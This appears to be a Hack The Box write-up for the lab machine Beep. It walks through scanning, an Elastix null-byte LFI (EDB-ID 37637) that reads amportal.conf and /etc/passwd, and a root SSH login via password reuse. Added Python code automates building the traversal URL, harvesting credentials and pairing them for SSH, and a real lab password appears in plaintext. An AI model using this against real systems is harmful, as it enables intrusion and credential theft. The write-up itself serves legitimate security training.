Ethical Hacking Lessons — Beep Writeup
This write-up covers the Hack The Box Beep machine. System administrators carry a heavy responsibility to manage the passwords of privileged accounts carefully. A seemingly minor application-level breach can escalate into a full system compromise when administrators do not follow password-management best practices. This write-up demonstrates how attackers take advantage of exactly that situation.
It is a Linux machine with the IP address 10.10.10.7. The radar graph on the machine page indicates that known CVEs are in play.
Recon
Let's start active recon with a full-range Nmap TCP scan (-p- covers all 65535 ports, -A enables version detection, OS detection and the default scripts, and -oX writes the results as XML).
nmap -A -T4 -p- -oX tcp_scan_results.xml 10.10.10.7
Below are the results produced by the scan.
The UDP port scan took a very long time and did not finish.
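Added example, not code from the original write-up: a small parser for the nmap -oX output written by the scan above, so the "which ports are open, and which of them are web services" question from the recon step is answered without scrolling through -A output. The XML below is a constructed sample in nmap's output format, with placeholder banners; it is not the author's tcp_scan_results.xml.

```python
# Added example (not from the original write-up): summarise an nmap -oX
# report. The XML is a constructed sample in nmap's output format with
# placeholder banners, not the author's real tcp_scan_results.xml.
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -T4 -p- -oX tcp_scan_results.xml 10.10.10.7">
  <host>
    <address addr="10.10.10.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.3"/>
      </port>
      <port protocol="tcp" portid="25">
        <state state="open"/>
        <service name="smtp" product="Postfix smtpd"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.3"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.3" tunnel="ssl"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="closed"/>
        <service name="mysql"/>
      </port>
      <port protocol="tcp" portid="10000">
        <state state="open"/>
        <service name="http" product="MiniServ"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return sorted [(port, proto, service, banner)] for every open port.

    Closed/filtered ports are skipped; an ssl tunnel is folded into the
    service name (ssl/http) the way nmap prints it in its text output.
    """
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name, banner = "?", ""
            if svc is not None:
                name = svc.get("name", "?")
                if svc.get("tunnel") == "ssl":
                    name = "ssl/" + name
                banner = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            found.append((int(port.get("portid")), port.get("protocol"), name, banner))
    return sorted(found)


def web_ports(xml_text):
    """Ports to point a browser or DirBuster at: anything nmap called http."""
    return [port for port, _, name, _ in open_ports(xml_text) if name.endswith("http")]


if __name__ == "__main__":
    for port, proto, name, banner in open_ports(SAMPLE_NMAP_XML):
        print(f"{port}/{proto:<4} {name:<10} {banner}")
    print("web enumeration candidates:", web_ports(SAMPLE_NMAP_XML))
```

Run it against the real file with open("tcp_scan_results.xml").read() in place of the sample; the web_ports list is the set of targets for the enumeration step that follows.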
Recon Results Analysis
Many ports are open, including HTTP, SSH and SMTP, so there is a good chance of more than one way into the machine.
Enumeration
Let's start by finding out what is running on port 80, so enter the IP address in the browser. It brings up the following warning about an invalid security certificate.
I added an exception for this page. Be careful about doing this on a real-life site. That brought up the following Elastix page.
A quick search showed that Elastix is a unified communications platform that bundles applications such as a PBX, email, IM and fax. I looked at the page source of the home page but found nothing interesting.
Wappalyzer showed that it is an Apache server running PHP.
I used this information to run DirBuster against the site with the following settings.
This returns a long list of directories and files. A couple of interesting ones are admin and help.
Navigating to the help page shows many other links. In particular, I was looking for version information.
I did come across a page that mentions the FreePBX version, as shown below.
Next, navigating to the admin page brings up the following pop-up.
I hit the Cancel button, as I did not know the credentials, which brought me to the following config.php page with an unauthorized access error.
For now, I set this information aside and ran searchsploit to see whether there are any known vulnerabilities.
It looks like there are some vulnerabilities of interest in the Elastix application.
Enumeration Analysis
I have to admit I did not enumerate every possibility on this box. With so many ports open, there is a lot more enumeration that could be performed. However, since exploits appear to be available for Elastix, I wanted to try those first.
Exploitation
Let's start with the LFI exploit listed in the searchsploit results. searchsploit's -p parameter prints the path of the exploit file along with the URL of its Exploit-DB entry.
Navigating to the Exploit-DB entry for EDB-ID 37637 brought up the following page.
The entry describes the vulnerability as follows:
Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
The entry also provides an example of how to exploit the vulnerability:
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
Let's try navigating to the same path on the target in the browser. Note the %00 at the end of the file name: it is a null byte, which PHP versions before 5.3.4 treat as the end of the include path, so whatever graph.php appends after the language name is dropped and the chosen file is included as-is.
The output is a little jumbled, so let's view the source of this page instead.
As the comments in the file explain, amportal.conf holds the settings for the Asterisk Management Portal. The interesting part is that several fields contain passwords in plaintext. Now that we have confirmed the local file inclusion vulnerability, nothing stops us from pulling other files, such as /etc/passwd.
Again, the output is not reader-friendly, so we can view the source of this page as well.
At this point I have a few usernames and passwords to play with. Soon after, I was able to log in to the Elastix portal with the username admin and the password jEhdIekWmdjE.
The Nmap scan had shown that SSH was open too, and having seen the contents of /etc/passwd, I then tried logging in over SSH as root with the same jEhdIekWmdjE password, and it worked. Yaaay!!!
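The exploitation steps above (building the traversal URL, harvesting credentials from amportal.conf, picking shell accounts out of /etc/passwd, and trying the harvested passwords over SSH) as one added Python example. This is not code from the original write-up or from Elastix: only the /vtigercrm/graph.php path and the current_language parameter come from the Exploit-DB entry quoted above, and the sample file contents, the placeholder passwords and the account name pbxuser are constructed for the example.

```python
# Added example, not code from the original write-up or from Elastix.
# Only the /vtigercrm/graph.php path and the current_language parameter
# come from the Exploit-DB entry; the sample file contents, placeholder
# passwords and the account "pbxuser" are constructed for the example.
from itertools import product
from urllib.parse import quote


def lfi_url(base, target, depth=8):
    """Build the graph.php traversal URL that includes an absolute path.

    The trailing null byte is the key: PHP releases before 5.3.4 stop
    reading the include() path at the null byte, so whatever graph.php
    appends after the language name is discarded and the raw file is
    returned in the response.
    """
    payload = "../" * depth + target + "\x00"
    return (f"{base}/vtigercrm/graph.php?current_language="
            f"{quote(payload, safe='/')}&module=Accounts&action")


# Constructed sample in the amportal.conf format: real key names,
# placeholder values. The live file holds the host's actual secrets.
SAMPLE_AMPORTAL = """\
# This file is part of FreePBX.
# AMPDBUSER: the user for connecting to the database
AMPDBUSER=asteriskuser
AMPDBPASS=placeholder_db_pass
AMPMGRUSER=admin
AMPMGRPASS=placeholder_mgr_pass
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=placeholder_ari_pass
FOPPASSWORD=placeholder_fop_pass
AMPWEBROOT=/var/www/html
"""


def parse_amportal(conf_text):
    """Turn KEY=VALUE lines into a dict, skipping comments and blanks."""
    settings = {}
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def harvest_credentials(conf_text):
    """Return (usernames, passwords) from the config, de-duplicated in
    first-seen order. Any key containing PASS is treated as a secret."""
    users, passwords = [], []
    for key, value in parse_amportal(conf_text).items():
        if "PASS" in key:
            if value not in passwords:
                passwords.append(value)
        elif "USER" in key:
            if value not in users:
                users.append(value)
    return users, passwords


# Constructed sample of /etc/passwd; "pbxuser" is a placeholder account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash
pbxuser:x:500:500::/home/pbxuser:/bin/bash
"""

NO_LOGIN = ("/sbin/nologin", "/usr/sbin/nologin", "/bin/false")


def login_users(passwd_text):
    """Accounts with an interactive shell: the ones worth trying over SSH."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_LOGIN:
            users.append(fields[0])
    return users


def ssh_candidates(conf_text, passwd_text):
    """Every (user, password) pair to try over SSH: each harvested password
    against each shell account, root first. This is the password-reuse
    check that turns the web-application file read into a root shell."""
    _, passwords = harvest_credentials(conf_text)
    users = login_users(passwd_text)
    users.sort(key=lambda u: u != "root")  # stable sort: root first, rest in order
    return list(product(users, passwords))


if __name__ == "__main__":
    print(lfi_url("https://10.10.10.7", "/etc/amportal.conf"))
    print(harvest_credentials(SAMPLE_AMPORTAL))
    for user, pw in ssh_candidates(SAMPLE_AMPORTAL, SAMPLE_PASSWD)[:4]:
        print(f"ssh {user}@10.10.10.7  # try password {pw}")
```

In practice the body returned for lfi_url(...) is wrapped in the HTML of graph.php (hence the author's "view source" step); strip the markup, feed the text to harvest_credentials, and the root/admin password reuse described above falls out as the first candidate pair.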
At this point I already had root-level access, so getting the root flag was just a matter of time.
Finding the user flag was no big deal either, given I had root.
Root Cause Analysis
Hosting software with known, unpatched vulnerabilities (here the Elastix LFI, EDB-ID 37637).
Storing credentials in plaintext in a configuration file (amportal.conf) that the web server process can read.
The administrator reusing the same password for root and for the application, which turned a web-application file read into a full system compromise.